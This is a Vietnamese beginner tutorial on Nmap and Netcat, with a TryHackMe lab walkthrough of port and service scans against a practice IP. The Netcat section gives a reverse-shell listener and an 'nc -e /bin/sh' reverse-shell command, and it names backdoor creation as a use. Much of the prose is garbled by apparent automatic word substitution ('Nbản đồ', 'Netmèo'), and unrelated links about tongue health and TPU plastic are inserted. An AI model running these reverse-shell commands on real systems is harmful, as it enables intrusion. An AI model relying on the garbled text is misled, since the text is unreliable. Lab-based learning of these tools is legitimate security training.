Nmap Là Gì, Công Cụ Quét Port Mạng Và Lỗ Hổng Bảo Mật Kinh Điển

 - 

Chào mừng các bạn đang đi tới cùng với bài bác 1 của series Kali Linux Căn Bản. Hôm ni chúng ta đã học bí quyết áp dụng Nmaps và Netcat. Đây là hai luật pháp khôn xiết đặc biệt quan trọng bởi vì được áp dụng không ít trong quy trình penetration testing.

Trong bài sẽ có được áp dụng kỹ năng và kiến thức ở cả hai series Mạng Căn Bản Linux Căn Bản, bạn như thế nào còn yếu kiến thức và kỹ năng về khối hệ thống mạng với đồ họa loại lệnh trên Linux thì cần xem thêm trước 2 series này nhé.

1 – Công vắt Nmaps (Task 2)

1a – Nmaps là gì?

Nmap, viết tắt của Network Mapper, là một qui định miễn giá thành cùng mã mối cung cấp mnghỉ ngơi được sử dụng mang lại mục tiêu thu thập báo cáo của mạng kim chỉ nam hoặc bình chọn bình yên của khối hệ thống mạng vẫn cai quản.

Nbản đồ hoàn toàn có thể được sử dụng để:

Xác định toàn bộ những hosts hoặc servers hiện tại có vào mạngXác định một server sẽ msinh sống mọi ports nào cùng hồ hết các dịch vụ nào đang chạy trên những ports đóXác định những hình thức dịch vụ bắt buộc chạy xe trên host hoặc hệ thống bao gồm sẽ hoạt động xuất sắc không? (Nếu các dịch vụ ngừng chạy, ports sẽ ảnh hưởng đóng)Xác định số đông hosts hoặc servers đang chạy tuyệt đang tắtXác định hệ quản lý và điều hành đang hoạt động của một host hoặc VPS Quét lỗi bảo mật thông tin các hình thức đang được điều khiển xe trên một host hoặc serverKiểm tra coi tường lửa gồm khóa những ports ko được phnghiền truy vấn không?v.v

Nmap rất có thể được dùng để làm quét các mạng lớn cùng cũng có thể được dùng để quét các mạng bé dại. Bây Giờ Nmap có thể được sử dụng trên những hệ quản lý Linux, Windows với MacOS. Ngoài giao diện chiếc lệnh, Nmaps còn có một phiên bản với hình ảnh người dùng được Gọi là Zenbản đồ.

Bạn đang xem: Nmap là gì, công cụ quét port mạng và lỗ hổng bảo mật kinh Điển


*
H1.1 Giao diện Zenmaps
*
H1.2 Giao diện dòng lệnh của Nbản đồ

Lưu ý:

khi chạy Nbản đồ trên giao diện chiếc lệnh, bạn phải chạy cùng với suvày. Trong trong cả quá trình quét kim chỉ nam, Nmap đã có lúc có nhu cầu các tài nguyên khối hệ thống hoặc phân quyền sinh hoạt cấp root, đó là lí do Nmap yêu cầu chạy cùng với subởi vì hoặc cùng với root.

1b – Cách thức thực hiện Nmap

Cú pháp của câu lệnh Nmap như sau:


nmaps
Quý Khách có thể chạy Nmaps chỉ cách thương hiệu câu lệnh với IP của phương châm yêu cầu quét ví dụ:


nbản đồ 192.168.0.2
Tuy nhiên, hôm nay, Nbản đồ sẽ chỉ scan 1000 TCPhường ports thông dụng tuyệt nhất nhưng thôi với nó cũng trở nên ko xuất ra bất cứ đọc tin gì nhìn trong suốt quy trình scan; chỉ cho tới lúc scan ngừng toàn thể 1000 TCP.. ports thì nó bắt đầu xuất ra công dụng. Vấn đề này dẫn mang lại vài bất tiện sau:

Bạn không thể biết quy trình scan đang diễn ra nỗ lực nào, liệu có lỗi gì hay không với liệu các bạn bắt buộc đợi trong bao lâu?Rất những hệ thống chạy những services quan trọng đặc biệt bên trên UDPhường. ports hoặc những TCPhường. ports trải lâu năm trường đoản cú port 1000 đến port 65535. Do kia vấn đề chạy Nmap như bên trên vẫn có tác dụng bỏ lỡ tương đối nhiều thông báo đặc trưng.

Để hạn chế 2 sự việc bên trên, chúng ta đề xuất sử dụng những flags của Nmaps. Các flags thường được áp dụng thông dụng bao gồm:

nbản đồ -sN /
-sn (ping scan): Ngoài năng lực scbình yên bộ network nhằm tìm kiếm hosts và servers sẽ online, flag -sn còn có thể được dùng để làm khẳng định xem một host hoặc VPS đã online tốt offline. Cú pháp như sau
nbản đồ -sN
-Pn: Trước lúc triển khai scan ports trên hệ thống đối tượng kim chỉ nam, Nmap vẫn đánh giá xem VPS mục tiêu gồm vẫn online giỏi không? Quá trình này vẫn tốn một khoản thời gian nhất thiết. Do đó nếu khách hàng sẽ biết chắc chắn hệ thống kim chỉ nam luôn luôn luôn online, bạn cũng có thể bỏ qua bước xác định này với flag -Pn. Hiện giờ, Nbản đồ đang mang định toàn bộ đều hosts hoặc servers bạn có nhu cầu quét số đông vẫn online với đã bỏ lỡ quá trình xác minh tâm trạng buổi giao lưu của (các) mục tiêu.-p-: khi thực hiện flag -p-, Nmaps đang tự động scan 65535 ports của mục tiêu. Quá trình này Tuy tốn không hề ít thời hạn, nhưng mà là một trong những quy trình quan trọng đặc biệt với họ tránh việc bỏ qua. Quý Khách nào quên có mang về port rất có thể xem lại bài xích sau.quý khách cũng hoàn toàn có thể sử dụng flag -p nhằm scan một hoặc một đội port nào kia ví dụ:Để scan port 8888 của mục tiêu:


nbản đồ -p8888
Để scan những port 1000, 4000, 7888 của mục tiêu:


nmap -p1000,4000,7888
Để scan một hàng ports khăng khăng ví dụ tự 2000 mang lại 3500:


nmap -p2000-3500
-sV (scan service version): Flag -sV vẫn cho mình biết phần nhiều hình thức dịch vụ như thế nào đang rất được chạy ứng cùng với đa số ports vừa tìm kiếm được, mặt khác hỗ trợ tên với version của rất nhiều hình thức dịch vụ đó. Đây là báo cáo hết sức có lợi vào quy trình tìm kiếm lỗi xâm nhập vào penchạy thử. -sU (scan UDPhường ports): Scan toàn bộ UDP ports. Đôi khi sẽ sở hữu phần đông hình thức điều khiển xe trên cả UDP ports, vì thế lúc penthử nghiệm chúng ta nhớ scan cả UDP.. ports nhé.-O (OS scan): Xác định hoặc dự đoán hệ điều hành quản lý đang rất được điều khiển xe trên hệ thống hoặc host phương châm.-sC (script scan): Với flag -sC, Nmaps vẫn áp dụng đầy đủ scripts search lỗi hoặc tích lũy đọc tin (được Điện thoại tư vấn là Nbản đồ Scripting Engine – NSE) khoác định được tích đúng theo bên phía trong nhằm tích lũy thông tin hoặc quét lỗi bảo mật trên khối hệ thống mục tiêu. Bên cạnh đó, bạn có thể áp dụng flag –script nhằm chạy một script tìm lỗi một mực như thế nào kia thế vì chưng chạy những scripts được khoác định của Nmaps. Để coi toàn bộ những scripts được tích hòa hợp bên trong Nmaps, những bạn cũng có thể thực hiện câu lệnh sau:
ls /usr/share/nmap/scripts
Bên trên là một trong những không nhiều những flags thông dụng sinh hoạt cung cấp cnạp năng lượng phiên bản của Nmaps mà lại mình thường được sử dụng khi chơi CTF. Những người dùng Nmaps nhiều năm chúng ta sẽ có khá nhiều phương pháp để tùy đổi mới Nmaps theo hướng mà họ mong ước, tuy vậy điều đó mình sẽ không đề cập đến tại đây, bạn làm sao hứng thụ hoàn toàn có thể tìm hiểu thêm website chủ yếu chủ của Nmap để giao lưu và học hỏi thêm nhé.

Bên cạnh đó, bất cứ cơ hội làm sao, trường hợp quên tác dụng của những flags hoặc mong mỏi bài viết liên quan các flags khác của Nbản đồ, các bạn luôn luôn có thể dùng câu lệnh sau:


man nbản đồ

*
H1b.1 – man nmap

Quý khách hàng như thế nào quên giải pháp thực hiện lệnh man, xin xem xét lại phần 3 của bài viết sau.

1c – Thực hành câu lệnh Nbản đồ (Task 2)

Ok sau phần lý thuyết phía trên, hiện nay chúng ta vẫn đi mang lại phần thực hành nhé. Chúng ta đã khởi rượu cồn sản phẩm thực hành trên hệ thống CC: Pentesting của TryHackMe lên. Các các bạn bnóng nút Deploy màu xanh da trời lá cây và chờ khoản hơn 1 phút mang đến khối hệ thống khởi cồn với hiện tại IP. của server lên nhé.

*
H1c.1

Với 9 thắc mắc kim chỉ nan trước tiên, các bạn nhờ vào những kỹ năng và kiến thức tại vị trí trên cộng cùng với tra cứu vớt trang lí giải áp dụng của lệnh Nmap trải qua câu lệnh bên dưới để vấn đáp nhé.


man nmaps
Mình đã gợi ý chúng ta 4 câu sau cuối.

Xem thêm: Lưỡi Bị Trắng Là Biểu Hiện Của Bệnh Gì ? Lưỡi Trắng: Vấn Đề Khoang Miệng Cần Lưu Ý


*
H1c.2

Ok, chúng ta đã đi qua từng câu hỏi nhé.

1 – How many ports are open on the machine (trên VPS tất cả từng nào ports đã mở?)

Chúng ta sẽ cần sử dụng câu lệnh sau:


nmap -vv -T4 -Pn -p- 10.10.207.69
Lưu ý:

IP của chúng ta không độc nhất vô nhị thiết phải tương tự IP. của mình nhé.

2 – What services are running on the machine (Tên của những hình thức dịch vụ làm sao đang làm việc trên các ports đã mở)?

Và câu 3

3 – What is the version of the service (Thương Mại Dịch Vụ đang hoạt động tất cả version là bao nhiêu)?

Chúng ta đang thực hiện câu lệnh sau:


nmap -vv -T4 -Pn -sV 10.10.207.69
Gợi ý mang lại câu 2:

Tên hình thức dịch vụ chưa phải là tên gọi của giao thức.

4 – What is the output of the http-title script(included in default scripts) (Cho biết tác dụng sau khoản thời gian chạy script http-title (script này còn có bao hàm trong flag -sC))?

Chúng ta sẽ sở hữu 2 giải pháp mang lại câu hỏi này

Giải pháp 1:


nmap -vv -T4 -Pn -sC 10.10.207.69
Giải pháp 2:


nmaps -vv -T4 -Pn --script=http-title 10.10.207.69
Tips:

Tgiỏi do buộc phải đi từng câu lệnh Nmaps nhỏng bên trên, bọn họ hoàn toàn có thể nhóm nó lại thành một câu lệnh độc nhất. Ở phía trên, nhằm tiết kiệm ngân sách thời gian cùng vị tôi đã làm trước rồi, bắt buộc mình đang chỉ scan 1000 TCPhường ports thứ nhất thôi. Lúc thao tác thực tiễn, chúng ta hãy luôn nỗ lực scan đầy đủ 65535 ports với cả UDPhường ports nhé. Câu lệnh của bản thân lúc đội lại đang nlỗi sau:


nmaps -vv -T4 -Pn -sV --script=http-title 10.10.207.69
Sau khi tác dụng câu lệnh trên được xuất ra, chúng ta hãy tham khảo kỹ công dụng đã vấn đáp được cả 4 câu cuối của task 2 nhé.

2 – Công nắm Netcát (nc) (Task 3)

2a – Giới thiệu lý lẽ Netcat

Netcát tốt còn được viết tắt là nc là một nguyên tắc bên trên giao diện mẫu lệnh Mặc dù đơn giản dễ dàng nhưng lại lại cực kì trẻ khỏe. Netcát được download khoác định trên không ít Linux distros ví dụ Ubuntu, Kali Linux, v.v. Necat rất có thể được thiết lập và áp dụng không chỉ là bên trên những hệ quản lý và điều hành Linux, Nhiều hơn cả đến Windows với MacOS nữa.

Netmèo rất có thể được thực hiện cho những mục tiêu sau:

Port scanning – nhằm mục đích khẳng định coi port vẫn mnghỉ ngơi tốt sẽ đóngTruyền dữ liệu thân 2 thiết bị Tạo backdoor (cổng hậu)v.v.

Cú pháp của câu lệnh Netcát như sau:


nc
2b – Một số câu lệnh Netcát giỏi được sử dụng

Để thực hành áp dụng Netmèo, bọn họ vẫn bắt buộc 2 trang bị Linux hoặc Windows gồm download Nemèo. Vì nghỉ ngơi bây chừ, chúng ta chỉ bao gồm nhất lắp thêm Kali Linux thôi, buộc phải mình vẫn để phần thực hành thực tế lại sau nhé.

Xem thêm: 5 Đặc Điểm Nổi Bật Của Hạt Nhựa Tpu Là Gì ? Nhựa Nhiệt Dẻo Tpu Là Gì

Câu lệnh 1: Đón reverse shell bởi Netcat


nc -nlvp
Câu lệnh trên bao gồm những nhân tố sau:

-n:Mang chân thành và ý nghĩa họ vẫn chỉ sử dụng IPv4 address, không cần sử dụng domain name name-l:Chế độ lắng nghe các kết nối đến-v:Verbose – Cho biết quá trình lắng tai đang diễn ra cố kỉnh nào-p:Chỉ định port để lắng nghe

lấy ví dụ ta gồm câu lệnh sau


nc -nlvp 8000
Một bí quyết nđính gọn gàng, câu lệnh trên đang mlàm việc port 8000 trên trang bị của hacker sống tâm trạng lắng tai các kết nối trỏ cho port 8000. Chúng ta đang thực hành thực tế câu lệnh này một đợt vào bài tiến công và xâm nhập server Pickle Rick.

Câu lệnh 2: Tạo liên kết reverse shell


nc -e /bin/sh
Trong đó:

-e /bin/sh: Sau lúc liên kết thành công nhằm mục tiêu thì tiến hành /bin/sh (mặc dù chưa phải version làm sao của Netcat cũng biến thành cung cấp flag -e)

Câu lệnh 3: Chuyển file thân 2 trang bị

Trên đồ vật đưa file sẽ chạy câu lệnh sau:


nc -w 3 Ví dụ:nc -w 3 192.168.0.12 8888
Trong đó:

-w 3: Dùng để chỉ thời hạn mà Netcat vẫn chờ phản hồi tự đích cho, giả dụ không tồn tại bất kể ý kiến như thế nào, Nemèo đã tự động hủy kết nối sau 3 giây.

Câu lệnh trên Tức là họ đã dùng Netcat sinh sản một liên kết mang lại port 8888 của shop 192.168.0.12 cùng đã chuyển tệp tin hello.txt tới cửa hàng IP.. kia trải qua liên kết vừa được chế tác. Netcat vẫn chờ máy 192.168.0.12 trong 3 giây, giả dụ lắp thêm đích mang lại ko ý kiến, Netcát đang tự động hóa ngắt kết nối.

Trên lắp thêm dấn file:

Chúng ta chạy câu lệnh sau:


nc -lp > Ví dụ: nc -lp 8888 > hello.txt
Câu lệnh trên có nghĩa là bọn họ sẽ mở port 8888 cùng lắng tai những kết nối trỏ tới. khi tất cả kết nối trỏ cho tới cùng tệp tin hello.txt được đưa đến, bọn họ đã xuất dữ liệu được đưa ra cùng lưu lại vào tệp tin có tên hello.txt bên trên thiết bị dìm file.

Để học tập thêm về những công dụng của netcat, những chúng ta cũng có thể sử dụng câu lệnh sau:


man nc
Các bạn hãy sử dụng những công bố phía bên trong man nc với những báo cáo trong bài để vấn đáp câu hỏi task 4 nhé.